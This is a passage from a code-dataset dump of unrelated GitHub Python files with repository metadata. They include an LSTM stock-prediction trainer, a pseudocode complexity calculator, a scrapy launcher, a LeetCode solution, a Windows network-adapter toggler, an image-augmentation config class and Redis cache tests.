load your training data\r\n #Loading Data set\r\n Stock_Data = pd.read_csv(\"./data/q2_dataset.csv\")\r\n store_data=np.zeros((1258,13))\r\n\r\n # The dataset was created in such a way to predict the next day opening price using the past 3 days Open, High, and Low prices and volume. \r\n # So each sample contains 12 features and 1 target. \r\n\r\n for i in range(len(store_data)-2):\r\n \r\n store_data[i][12]=Stock_Data.iloc[i+3][3] #target\r\n\r\n store_data[i][0]=Stock_Data.iloc[i+2][3] #open -1\r\n store_data[i][1]=Stock_Data.iloc[i+1][3] #open -2\r\n store_data[i][2]=Stock_Data.iloc[i][3] #open -3\r\n\r\n store_data[i][3]=Stock_Data.iloc[i+2][4] #High -1\r\n store_data[i][4]=Stock_Data.iloc[i+1][4] #High -2\r\n store_data[i][5]=Stock_Data.iloc[i][4] #High -3\r\n\r\n store_data[i][6]=Stock_Data.iloc[i+2][5] #Low -1\r\n store_data[i][7]=Stock_Data.iloc[i+1][5] #Low -2\r\n store_data[i][8]=Stock_Data.iloc[i][5] #Low -3\r\n\r\n store_data[i][9]=Stock_Data.iloc[i+2][2] #Volume -1\r\n store_data[i][10]=Stock_Data.iloc[i+1][2] #Volume -2\r\n store_data[i][11]=Stock_Data.iloc[i][2] #Volume -3\r\n\r\n col_names=['Open-1','Open-2','Open-3','High-1','High-2','High-3','Low-1','Low-2','Low-3','Volume-1','Volume-2','Volume-3','Target']\r\n\r\n df=pd.DataFrame(store_data[:-2,:],columns=col_names)\r\n data=df.drop(['Target'],axis=1)\r\n ran = 0\r\n #the dataset was randomized to create ‘train_data_RNN.csv’ and ‘test_data_RNN.csv.\r\n X_train, X_test, y_train, y_test = train_test_split(data, df['Target'], test_size=0.3, random_state = ran) \r\n train_data=pd.concat([X_train,y_train],axis=1)\r\n test_data=pd.concat([X_test,y_test],axis=1)\r\n # Commenting the exporting of ‘train_data_RNN.csv’ and ‘test_data_RNN.csv’\r\n # train_data.to_csv(r'./data/train_data_RNN.csv', index = False, header=True)\r\n # test_data.to_csv(r'./data/test_data_RNN.csv', index = False, header=True)\r\n\r\n #reading the train data\r\n Train_Data = pd.read_csv(\"./data/train_data_RNN.csv\")\r\n #creating the X_train\r\n X_train=Train_Data.drop(['Target'],axis=1)\r\n #creating y_train\r\n y_train=Train_Data['Target']\r\n\r\n #scaling the dataset using minmaxscaler\r\n scaler=MinMaxScaler(feature_range=(0,1))\r\n X_train=scaler.fit_transform(X_train)\r\n\r\n #numpy array conversion\r\n X_train=np.array(X_train)\r\n # reshape input to be [samples, time steps, features] which is required for LSTM\r\n X_train =X_train.reshape(X_train.shape[0],X_train.shape[1] , 1)\r\n\r\n\r\n\r\n # 2. Train your network\r\n model = Sequential()\r\n #adding LSTM layer with 50 LSTM units\r\n model.add(LSTM(50,input_shape=(X_train.shape[1],1),return_sequences=True))\r\n #adding LSTM layer with 150 LSTM units\r\n model.add(LSTM(150))\r\n #adding dense layer\r\n model.add(Dense(1,activation='linear'))\r\n\r\n #'mean_squared_error' has been used as loss function\r\n # Optimizer: Here adam optimizer has been used.\r\n # Adam is an adaptive learning rate optimization algorithm that’s been designed specifically for\r\n # training deep neural networks.\r\n\r\n model.compile(loss='mean_squared_error',optimizer='adam',metrics=['mae'])\r\n\r\n History = model.fit(X_train,y_train,epochs=600,batch_size=64,verbose=2)\r\n # \t\tMake sure to print your training loss within training to show progress\r\n # \t\tMake sure you print the final training loss\r\n print('The final training loss is ',History.history['loss'][-1])\r\n\r\n\r\n\r\n # 3. 
Save your model\r\n # Please uncomment the following line to save the model in the models directory\r\n model.save('./models/Group25_RNN_model.h5')","repo_name":"RavideepSingh15/ECE-657---Intelligent-System-Design","sub_path":"Assignment 3/train_RNN.py","file_name":"train_RNN.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1969933121","text":"import os\nimport re\nimport sympy as sp\nimport tkinter as tk\n\nfrom tkinter import filedialog\n\n\ndef process_if(file, line):\n\tglobal alg_list\n\t_if = _else = len(re.split(' y | o ', line))\n\tflag = True\n\tline = file.readline()\n\talg_list.append(line)\n\tline = line.lower()\n\twhile not line.startswith('fsi'):\n\t\tif line.startswith('sino'):\n\t\t\tflag = False\n\t\t\tline = file.readline()\n\t\t\talg_list.append(line)\n\t\t\tline = line.lower()\n\t\t\tcontinue\n\t\tif flag:\n\t\t\t_if = _if + 1\n\t\telse:\n\t\t\t_else = _else + 1\n\t\tline = file.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\tif _if > _else:\n\t\tans = f'+{_if}'\n\telse:\n\t\tans = f'+{_else}'\n\treturn ans, file\n\n\ndef process_for(file, line):\n\tglobal alg_list\n\tinter = \"(\"\n\tfor_data = re.split(',|\\n', re.split('=', re.split(' ', line)[1])[1])\n\t\n\tif for_data[2].startswith('+'):\n\t\tli, ls, inc = for_data[0], for_data[1], for_data[2]\n\telif for_data[2].startswith('-'):\n\t\tli, ls, inc = for_data[1], for_data[0], for_data[2]\n\n\tline = file.readline()\n\talg_list.append(line)\n\tline = line.lower()\n\tlimits = f'(({ls}-{li}+1)/{inc[1:]})'\n\tcount = 0\n\n\twhile not line.startswith('fpara'):\n\t\tif line.startswith('para'):\n\t\t\tif count != 0:\n\t\t\t\tinter += f'+{count}'\n\t\t\tval, file = process_for(file, line)\n\t\t\tinter += val\n\t\t\tcount = 0\n\t\telif line.startswith('si'):\n\t\t\tif count != 0:\n\t\t\t\tinter += f'+{count}'\n\t\t\tval, file = process_if(file, line)\n\t\t\tinter += val\n\t\t\tcount = 0\n\t\telse:\n\t\t\tcount = count + 1\n\t\tline = file.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\tif count != 0:\n\t\tinter += f'+{count}'\n\tinter += ')'\n\tans = f'+({limits}*{inter}+2*({limits}+1))'\n\treturn ans, file\n\n\ndef calculate():\n\tglobal answer1, answer2, alg_list, text1\n\ttext1.config(state=tk.NORMAL)\n\ttext1.delete('1.0', tk.END)\n\tfile_path = filedialog.askopenfilename()\n\tans = \"\"\n\tans_simp = \"\"\n\talg_list = []\n\twith open(file_path, 'r') as f:\n\t\tans = \"\"\n\t\tline = f.readline()\n\t\talg_list.append(line)\n\t\tline = line.lower()\n\t\tcount = 0\n\t\twhile not line.startswith('pare'):\n\t\t\tif line.startswith('inicio'):\n\t\t\t\tline = f.readline()\n\t\t\t\talg_list.append(line)\n\t\t\t\tline = line.lower()\n\t\t\t\tcontinue\n\t\t\telif line.startswith('si'):\n\t\t\t\tif count != 0:\n\t\t\t\t\tans += f'+{count}'\n\t\t\t\tval, f = process_if(f, line)\n\t\t\t\tans += val\n\t\t\t\tcount = 0\n\t\t\telif line.startswith('para'):\n\t\t\t\tif count != 0:\n\t\t\t\t\tans += f'+{count}'\n\t\t\t\tval, f = process_for(f, line)\n\t\t\t\tans += val\n\t\t\t\tcount = 0\n\t\t\telse:\n\t\t\t\tcount = count + 1\n\t\t\tline = f.readline()\n\t\t\talg_list.append(line)\n\t\t\tline = line.lower()\n\t\tif count != 0:\n\t\t\tans += f'+{count}'\n\t\tans_simp = 'T(n) = ' + str(sp.simplify(ans)).replace('**', '^')\n\t\tans = 'T(n) = ' + ans\n\t\tprint(ans)\n\tfor alg in alg_list:\n\t\ttext1.insert(tk.END, 
alg)\n\ttext1.config(state=tk.DISABLED)\n\tanswer1.set(ans)\n\tanswer2.set(ans_simp)\n\t\ndef main():\n\tglobal answer1, answer2, alg_list, text1\n\troot = tk.Tk()\n\troot.title("T(n) Calculation")\n\troot.geometry("600x700")\n\troot.grid_columnconfigure(0, weight=1)\n\n\tsep_text = "---------------------------------------------------------------------------------------------"\n\tsep_font = ('lato', 12)\n\n\tsep0 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep0.pack()\n\n\ttitlelabel = tk.Label(root, text="T(n) Calculation", font=('lato', 14, 'bold'))\n\ttitlelabel.pack()\n\n\tsep1 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep1.pack()\n\n\tbutton1 = tk.Button(root, text="Select File", command=calculate, font=('lato', 10))\n\tbutton1.pack()\n\n\tsep2 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep2.pack()\n\n\tanswer1 = tk.StringVar()\n\tanswer1.set("")\n\tanswer2 = tk.StringVar()\n\tanswer2.set("")\n\n\tnored = tk.Label(root, text='Unsimplified T(n)', font=('lato', 11))\n\tnored.pack()\n\n\tsep3 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep3.pack()\n\n\tlabel1 = tk.Label(root, textvariable=answer1, font=('consolas', 11), wraplength=550)\n\tlabel1.pack()\n\n\tsep4 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep4.pack()\n\n\tred = tk.Label(root, text='Simplified T(n)', font=('lato', 11))\n\tred.pack()\n\n\tsep5 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep5.pack()\n\n\tlabel2 = tk.Label(root, textvariable=answer2, font=('consolas', 11), wraplength=550)\n\tlabel2.pack()\n\n\tsep6 = tk.Label(root, text=sep_text, font=sep_font)\n\tsep6.pack()\n\n\talglabel = tk.Label(root, text="Algorithm", font=('lato', 11))\n\talglabel.pack()\n\n\tscrollbar1 = tk.Scrollbar(root)\n\ttext1 = tk.Text(root, height=15, font=('consolas', 11))\n\tscrollbar1.pack(side=tk.RIGHT)\n\ttext1.pack(side=tk.LEFT, fill=tk.X)\n\tscrollbar1.config(command=text1.yview)\n\ttext1.config(yscrollcommand=scrollbar1.set)\n\ttext1.config(state=tk.DISABLED)\n\n\troot.mainloop()\n\n\nif __name__ == "__main__":\n\tmain()","repo_name":"EddAngulo/algorithms_202030_final_project","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"24113811378","text":"from scrapy import cmdline\nimport os\n\n# cmdline.execute(\"scrapy crawlall\".split())\n# cmdline.execute(\"scrapy crawl dzh -o dzh.csv\".split())\n\nfrom tkinter import *\nimport time\n\nfrom tkinter import *\n\n\ndef callback():\n    var.set('The program is running, please wait...')\n    #cmdline.execute(\"scrapy crawlall\".split())\n    #cmdline.execute(\"scrapy crawl dzh -o dzh.csv\".split())\n    #cmdline.execute(\"scrapy crawl detail\".split())\n\n    os.system(\"scrapy crawlall -s CLOSESPIDER_TIMEOUT=120\")\n    os.system(\"scrapy crawl dzh -o dzh.csv\")\n    os.system(\"scrapy crawl detail\")\n    os.system(\"scrapy crawl pbdetail\")\n\nroot = Tk()\n\nframe1 = Frame(root)  # Frame widget: displays a rectangular area on screen, mostly used as a container\nframe2 = Frame(root)\n\ntodayDate = time.strftime('%Y-%m-%d', time.localtime(time.time()))\nvar = StringVar()  # build the message string\nvar.set(\"Today's date is: \"+todayDate+\"\\n Start running all spiders in parallel?\")\n\ntextLabel = Label(frame1,\n                  textvariable=var,\n                  justify=LEFT)\n\ntextLabel.pack(side=LEFT)\n\ntheButton = Button(frame2, text=\"Crawl everything\", command=callback)  # define a button\ntheButton.pack()\n\nframe1.pack(padx=10, pady=10)  # lay out the frames\nframe2.pack(padx=50, 
pady=50)\n\nmainloop()","repo_name":"guoyuqing666/mdas_online","sub_path":"SpiderObject/SpiderObject/startAllSpiders.py","file_name":"startAllSpiders.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"33846147897","text":"class Solution(object):\n    def merge(self, nums1, m, nums2, n):\n        \"\"\"\n        :type nums1: List[int]\n        :type m: int\n        :type nums2: List[int]\n        :type n: int\n        :rtype: void Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        # nums3 = nums1[:m]\n        # nums1[:] = []\n        # i, j = 0, 0\n        # while i < m and j < n:\n        #     if nums3[i] > nums2[j]:\n        #         nums1.append(nums2[j])\n        #         j += 1\n        #     else:\n        #         nums1.append(nums3[i])\n        #         i += 1\n        # if i < m:\n        #     nums1[i + j:] = nums3[i:]\n        # if j < n:\n        #     nums1[i + j:] = nums2[j:]\n        # print(nums1)\n\n        p1 = m - 1\n        p2 = n - 1\n        p = m + n - 1\n        while p1 >= 0 and p2 >= 0:\n            if nums1[p1] <= nums2[p2]:\n                nums1[p] = nums2[p2]\n                p -= 1\n                p2 -= 1\n            else:\n                nums1[p] = nums1[p1]\n                p1 -= 1\n                p -= 1\n        nums1[:p2 + 1] = nums2[:p2 + 1]\n        print(nums1)\n\n\nif __name__ == \"__main__\":\n    # nums1 = [4, 0, 0, 0, 0, 0]\n    # m = 1\n    # nums2 = [1, 2, 3, 5, 6]\n    # n = 5\n    nums1 = [0]\n    m = 0\n    nums2 = [1]\n    n = 1\n    print(Solution().merge(nums1, m, nums2, n))\n","repo_name":"simplynaive/LeetCode","sub_path":"88. Merge Sorted Array.py","file_name":"88. Merge Sorted Array.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4594515017","text":"\"\"\"\nLIBRARIES\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\n\n\n# PRESENTATION\n# Colors\n\nfrom colorama import Fore, Back, Style\n\n# DEBUG FUNCTIONS\n# os.sys(\"pause\")\n\n\"\"\"\nWindows Adapter Lib\n\"\"\"\nimport wmi\n\n\"\"\"\nGENERAL\n\"\"\"\n# Sleep\nimport time\n# OS\nimport os\n# UAC\nfrom elevate import elevate\n\n\"\"\"\n????????????\n\"\"\"\n\nimport regex\n\n\"\"\"\nCLI Libraries\n\"\"\"\n\nfrom PyInquirer import style_from_dict, Token, prompt, Separator\nfrom PyInquirer import Validator, ValidationError\nfrom pprint import pprint\n\n\n\n\"\"\"\nCOOL INSANE TITLE\n\"\"\"\n\nfrom pyfiglet import Figlet\n\n\n\"\"\"\nCLEAR FUNCTION\n\"\"\"\n\nclear = lambda: os.system('cls')\n\n\n\"\"\"\nAvailable Network Cards\n\"\"\"\n\ndef ListAvailableNetworkCards():\n    return [conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ]\n\n\n\n\n\"\"\"\nMENU\n\"\"\"\n\n\n\ndef menu():\n    style = style_from_dict({\n        Token.QuestionMark: '#E91E63 bold',\n        Token.Selected: '#673AB7 bold',\n        Token.Instruction: '',  # default\n        Token.Answer: '#2196f3 bold',\n        Token.Question: '',\n    })\n\n\n    cartes_dispo = ListAvailableNetworkCards()\n    cartes_dispo.sort()\n    cartes_dispo.append('CANCEL')\n\n    # print(cartes_dispo)\n\n    questions=[\n\n        {\n            'type': 'list',\n            'name': 'app_choice',\n            'message': 'What do you want to do ?',\n            'choices': ['Reboot Network Card', 'Change Network Card', 'Choose a Network Card', 'Enable a Network Card', 'Disable a Network Card','Quit']\n\n\n        },\n\n\n\n\n        # >>>> Adapter List <<<<\n\n\n        # Reboot\n\n        {\n            'type': 'list',\n            'name': 'adapter name',\n            'message': 'Pick the Network Card you want to reboot : (enter CANCEL to quit)',\n            'choices': cartes_dispo,\n            #'default': cartes_dispo[1],\n            'when': lambda answers: answers['app_choice'] == 'Reboot Network Card'\n        },\n\n\n        #\n        {\n            'type': 'list',\n            'name': 'choose_adapter',\n            'message': 'Pick the 
Network Card you want to enable :',\n            'choices': cartes_dispo,\n            'when': lambda answers: answers['app_choice'] == 'Choose a Network Card'\n        },\n\n\n        # Change\n\n\n        {\n            'type': 'list',\n            'name': 'change_adapter_old',\n            'message': 'pick the Network Card you want to disable : ',\n            'choices': cartes_dispo,\n            'when': lambda answers: answers['app_choice'] == 'Change Network Card'\n        },\n\n        {\n            'type': 'list',\n            'name': 'change_adapter_new',\n            'message': 'pick the Network Card you want to enable : ',\n            'choices': cartes_dispo,\n            'when': lambda answers: answers['app_choice'] == 'Change Network Card' and answers['change_adapter_old'] != 'CANCEL'\n        },\n\n\n        # Disable\n\n        {\n            'type': 'list',\n            'name': 'adapter_off',\n            'message': 'pick the Network Card you want to disable : ',\n            'choices': cartes_dispo,\n            'when': lambda answers: answers['app_choice'] == 'Disable a Network Card'\n        },\n\n\n        # Enable\n\n        {\n            'type': 'list',\n            'name': 'adapter_on',\n            'message': 'pick the Network Card you want to enable',\n            'choices': cartes_dispo,\n            'when': lambda answers: answers['app_choice'] == 'Enable a Network Card'\n        },\n\n        # >>>> Confirms <<<<\n\n        {\n            'type': 'confirm',\n            'name': 'change_confirm',\n            'message': 'Are you sure you want to change it ?',\n            'default': False,\n            'when': lambda answers: answers['app_choice'] == 'Change Network Card' and answers['change_adapter_old'] != 'CANCEL' and answers['change_adapter_new'] != 'CANCEL'\n        },\n\n\n\n        #{\n        #    'type': 'confirm',\n        #    'name': 'relancer_confirm',\n        #    'message': 'do you want to reboot the network card ?',\n        #    'default': False,\n        #    'when': lambda answers: answers['app_choice'] == 'Reboot Network Card' and answers['adapter name'] != 'CANCEL'\n        #},\n\n        {\n            'type': 'confirm',\n            'name': 'quit_confirm',\n            'message': 'Do you want to Exit ?',\n            'default': False,\n            'when': lambda answers: answers['app_choice'] == 'Quit'\n        }\n\n\n\n    ]\n\n    answers = prompt(questions, style=style)\n\n    return answers\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nMENU CONSEQUENCES / LAUNCHER\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef action():\n\n    clear()\n    # print([conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ])\n    f = Figlet(font='slant')\n    print(f.renderText('NETWORKED'))\n\n    print(Fore.CYAN + \"A simple toolbox to manage network cards, written in Python 3\\n\\n \" + Fore.WHITE)\n\n    print(\"--- \" + Fore.YELLOW + \"Github/allemand-instable\" + Fore.WHITE + \" ---\\n\\n\\n\")\n\n    answer = menu()\n\n    print(answer)\n    if answer['app_choice'] == 'Reboot Network Card' :\n        if answer['adapter name'] != 'CANCEL':  #and answer['relancer_confirm'] == True :\n            carte = answer['adapter name']\n            relancer_carte(carte)\n\n\n    if answer['app_choice'] == 'Enable a Network Card' and answer['adapter_on'] != 'CANCEL' :\n        carte = answer['adapter_on']\n        activer_carte(carte)\n\n\n    if answer['app_choice'] == 'Disable a Network Card' and answer['adapter_off'] != 'CANCEL' :\n        carte = answer['adapter_off']\n        desactiver_carte(carte)\n\n\n    # CHANGE THE NETWORK CARD\n\n    if answer['app_choice'] == 'Change Network Card' :\n        if answer['change_adapter_old'] != 'CANCEL' :\n            if answer['change_adapter_new'] != 'CANCEL' :\n                if answer['change_confirm'] == True :\n                    ancienne_carte = answer['change_adapter_old']\n                    nouvelle_carte = answer['change_adapter_new']\n                    changer_carte(ancienne_carte, nouvelle_carte)\n\n    if answer['app_choice'] == 'Quit' and answer['quit_confirm'] == False :\n        return True\n\n    if answer['app_choice'] == 'Choose a Network Card' and 
answer['choose_adapter'] == 'CANCEL' :\n        return True\n\n    if answer['app_choice'] == 'Choose a Network Card' and answer['choose_adapter'] != 'CANCEL' :\n        carte = answer[\"choose_adapter\"]\n        choisir_carte(carte)\n\n\n    if answer[\"app_choice\"] == 'Quit' and answer[\"quit_confirm\"] == True :\n        clear()\n        return False\n\n\n    return True\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nLOOP FUNCTION\n\"\"\"\n\n\n\n\n\n\ndef run():\n    running = True\n    while running :\n        #print(running)\n        running = action()\n        print(running)\n    return\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\nNETWORK CARD FUNCTIONS\n\"\"\"\n\n\n\ndef changer_carte(ancienne_carte, nouvelle_carte):\n    desactiver_carte(ancienne_carte)\n    activer_carte(nouvelle_carte)\n    return\n\ndef desactiver_carte(carte):\n    c=wmi.WMI()\n    o=c.query(\"select * from Win32_NetworkAdapter\")\n    #print(c)\n    #print(o)\n    for conn in o :\n        #print(conn.NetConnectionID)\n        #print(conn.Caption + \" - \" + conn.Description)\n        if conn.NetConnectionID == carte:\n            if conn.NetEnabled:\n                conn.Disable()\n\n            else:\n                print(carte, ' is already disabled')\n            #    conn.Enable()\n    return\n\ndef activer_carte(carte):\n    c=wmi.WMI()\n    o=c.query(\"select * from Win32_NetworkAdapter\")\n    #print(c)\n    #print(o)\n    for conn in o :\n        #print(conn.NetConnectionID)\n        #print(conn.Caption + \" - \" + conn.Description)\n        if conn.NetConnectionID == carte:\n            if conn.NetEnabled:\n                #conn.Disable()\n                print(carte, ' is already enabled')\n            else:\n                conn.Enable()\n    return\n\n\n\ndef relancer_carte(carte):\n    print(\"ok\")\n    desactiver_carte(carte)\n    activer_carte(carte)\n    return\n\n\n\n\ndef choisir_carte(carte_choisie):\n    list = [conn.NetConnectionID for conn in wmi.WMI().query(\"select * from Win32_NetworkAdapter\") if conn.NetConnectionID ]\n    for carte in list :\n        if carte != carte_choisie :\n            desactiver_carte(carte)\n        else :\n            activer_carte(carte)\n    return\n\n\n\n\n\n\n\n\n\n\"\"\"\nMAIN FUNCTION\n\"\"\"\n\n\ndef main():\n    run()\n    return 0\n\n# entry point\nif __name__ == \"__main__\" :\n    elevate()\n    main()\n","repo_name":"allemand-instable/Networked","sub_path":"old/v1/Networked.py","file_name":"Networked.py","file_ext":"py","file_size_in_byte":8065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"19949922718","text":"\"\"\"Contains methods for augmentation.\"\"\"\nfrom typing import NamedTuple\nfrom imgaug import augmenters\n\n# See\n# https://github.com/aleju/imgaug\n# for visual context\n\n\nclass AugmentationOptions(NamedTuple):\n    \"\"\"Which augmentations to turn on or off.\"\"\"\n\n    channel_shuffle: bool = False\n    brightness: bool = False\n    gaussian_noise: bool = False\n    dropout_boxes: bool = False\n    salt_and_pepper: bool = False\n    jpeg_artifacts: bool = False\n    gaussian_blur: bool = False\n    vertical_flip: bool = False\n    distortion: bool = False\n    rotate: bool = False\n    scale_and_translate: bool = False\n    color: bool = False\n\n    @classmethod\n    def all_activated(cls):\n        \"\"\"Return options with every augmentation activated.\"\"\"\n        true_array = [True for _ in range(12)]\n        return cls(*true_array)\n\n    def to_dict(self) -> dict:\n        \"\"\"Convert options to dumpable dictionary.\"\"\"\n        return {\n            \"channel_shuffle\": self.channel_shuffle,\n            \"brightness\": self.brightness,\n            \"gaussian_noise\": self.gaussian_noise,\n            \"dropout_boxes\": self.dropout_boxes,\n            \"salt_and_pepper\": self.salt_and_pepper,\n            \"jpeg_artifacts\": self.jpeg_artifacts,\n            \"gaussian_blur\": self.gaussian_blur,\n            \"vertical_flip\": self.vertical_flip,\n            \"distortion\": self.distortion,\n            \"rotate\": self.rotate,\n            \"scale_and_translate\": self.scale_and_translate,\n            \"color\": self.color,\n        }\n\n    @classmethod\n    def from_dict(cls, dictionary: dict):\n        \"\"\"Restore augmentation options from dictionary.\"\"\"\n        return cls(**dictionary)\n\n    def activated_count(self) -> int:\n        \"\"\"Count how many augmentations are activated.\"\"\"\n        return (\n            self.channel_shuffle * 1\n            + self.brightness * 1\n            + self.gaussian_noise * 1\n            + self.dropout_boxes * 1\n            + self.salt_and_pepper * 1\n            + self.jpeg_artifacts * 1\n            + self.gaussian_blur * 1\n            + self.vertical_flip * 1\n            + self.distortion * 1\n            + self.rotate * 1\n            + self.scale_and_translate * 1\n            + self.color * 1\n        )\n\n    def _get_channel_shuffle(self) -> augmenters.Augmenter:\n        # Shuffle channels in 15% of all images\n        if self.channel_shuffle:\n            return augmenters.ChannelShuffle(0.15)\n        return augmenters.Identity()\n\n    def _get_brightness(self) -> augmenters.Augmenter:\n        # Changes brightness\n        if self.brightness:\n            return augmenters.Add((-70, 70))\n        return augmenters.Identity()\n\n    def _get_gaussian_noise(self) -> augmenters.Augmenter:\n        # Makes the image slightly more noisy; the scale range is an assumed moderate default\n        if self.gaussian_noise:\n            return augmenters.AdditiveGaussianNoise(scale=(0, 0.17 * 255))\n        return augmenters.Identity()\n\n    def _get_gaussian_blur(self) -> augmenters.Augmenter:\n        # Blur with a random sigma; the sigma range is an assumed moderate default\n        if self.gaussian_blur:\n            return augmenters.GaussianBlur(sigma=(0.0, 2.0))\n        return augmenters.Identity()\n\n    def _get_dropout_boxes(self) -> augmenters.Augmenter:\n        # Renders small black boxes over the image, blocking 5% of the image\n        if self.dropout_boxes:\n            return augmenters.CoarseDropout(0.05, size_percent=7)\n        return augmenters.Identity()\n\n    def _get_salt_and_pepper(self) -> augmenters.Augmenter:\n        # Replaces 4% of all pixels with salt and pepper noise\n        if self.salt_and_pepper:\n            return augmenters.SaltAndPepper(0.04)\n        return augmenters.Identity()\n\n    def _get_jpeg_artifacts(self) -> augmenters.Augmenter:\n        # Adds JPEG compression artifacts\n        if self.jpeg_artifacts:\n            return augmenters.JpegCompression(compression=(80, 95))\n        return augmenters.Identity()\n\n    def _get_vertical_flip(self) -> augmenters.Augmenter:\n        # Flip vertically with a chance of 35%\n        if self.vertical_flip:\n            return augmenters.Flipud(0.35)\n        return augmenters.Identity()\n\n    def _get_distortion(self) -> augmenters.Augmenter:\n        # Slight distortion\n        if self.distortion:\n            return augmenters.PiecewiseAffine(scale=(0.0, 0.04))\n        return augmenters.Identity()\n\n    def _get_scale_and_translate(self) -> augmenters.Augmenter:\n        # First scale, then shift the image\n        translation_percent = 0.2\n        if self.scale_and_translate:\n            return augmenters.Affine(\n                scale=(0.7, 1.4),\n                translate_percent={\n                    \"x\": (-translation_percent, translation_percent),\n                    \"y\": (-translation_percent, translation_percent),\n                },\n            )\n        return augmenters.Identity()\n\n    def _get_rotater(self) -> augmenters.Augmenter:\n        # Rotate between -35 and 35 degrees\n        if self.rotate:\n            return augmenters.Rotate((-35, 35))\n        return augmenters.Identity()\n\n    def _get_color(self) -> augmenters.Augmenter:\n        # Change hue by -15% to +15% and saturation by -55% to +55%\n        if self.color:\n            return augmenters.MultiplyHueAndSaturation(\n                mul_hue=(0.85, 1.15),\n                mul_saturation=(0.45, 1.55),\n            )\n        return augmenters.Identity()\n\n    def get_augmenter(self) -> augmenters.Augmenter:\n        \"\"\"Compile an augmenter to augment images or batches of images.\"\"\"\n        if self.activated_count() == 0:\n            return augmenters.Identity()\n\n        chance_of_augmentation_to_be_applied = 6 / self.activated_count()\n        if chance_of_augmentation_to_be_applied > 1:\n            chance_of_augmentation_to_be_applied = 1\n\n        augmentations = [\n            self._get_channel_shuffle(),\n            self._get_brightness(),\n            self._get_gaussian_noise(),\n            self._get_gaussian_blur(),\n            self._get_dropout_boxes(),\n            self._get_salt_and_pepper(),\n            
self._get_jpeg_artifacts(),\n self._get_vertical_flip(),\n self._get_distortion(),\n self._get_scale_and_translate(),\n self._get_rotater(),\n self._get_color(),\n ]\n\n augmentations = [\n aug\n for aug in augmentations\n if not isinstance(aug, augmenters.Identity)\n ]\n\n return augmenters.SomeOf((3, 6), augmentations)\n","repo_name":"DennisNemec/school-nn","sub_path":"schoolnn/models/augmentation_options.py","file_name":"augmentation_options.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19938032831","text":"import redis\nimport json\nimport pytest\n\nfrom smache.stores.redis_store import RedisStore\nfrom smache.timestamp_registry import TimestampRegistry\n\nredis_con = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n\n@pytest.yield_fixture(autouse=True)\ndef flush_before_each_test_case():\n redis_con.flushall()\n yield\n\n\n@pytest.yield_fixture\ndef redis_store():\n yield RedisStore(redis_con, TimestampRegistry(redis_con))\n\n\ndef test_stored_elements_can_be_looked_up(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n stored_element = redis_store.lookup(\"hello\")\n\n assert stored_element.value == \"world\"\n\n\ndef test_newly_stored_elements_are_fresh(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.is_fresh(\"hello\") == True\n\n\ndef test_key_marked_as_stale_is_not_fresh(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.is_fresh(\"hello\") == True\n\n redis_store.mark_as_stale(\"hello\")\n\n assert redis_store.is_fresh(\"hello\") == False\n\n\ndef test_all_keys_of_namespace_are_marked_as_stale(redis_store):\n key1 = \"namespace:key\"\n key2 = \"other_namespace:key\"\n redis_store.store(key1, \"coolio\", 0)\n redis_store.store(key2, \"coolio\", 0)\n\n assert redis_store.is_fresh(key1)\n assert redis_store.is_fresh(key2)\n\n redis_store.mark_all_as_stale(\"namespace\")\n\n assert redis_store.is_fresh(key1) == False\n assert redis_store.is_fresh(key2)\n\n\ndef test_value_is_only_written_when_newer_then_current(redis_store):\n registry = TimestampRegistry(redis_con)\n redis_store = RedisStore(redis_con, registry)\n\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.lookup(\"hello\").value == \"world\"\n\n registry.increment_state_timestamp(\"hello\")\n\n redis_store.store(\"hello\", \"new_world\", 0)\n\n assert redis_store.lookup(\"hello\").value == \"world\"\n\n redis_store.store(\"hello\", \"new_world\", 1)\n\n assert redis_store.lookup(\"hello\").value == \"new_world\"\n\n\n# This test is really NOT a good practice. 
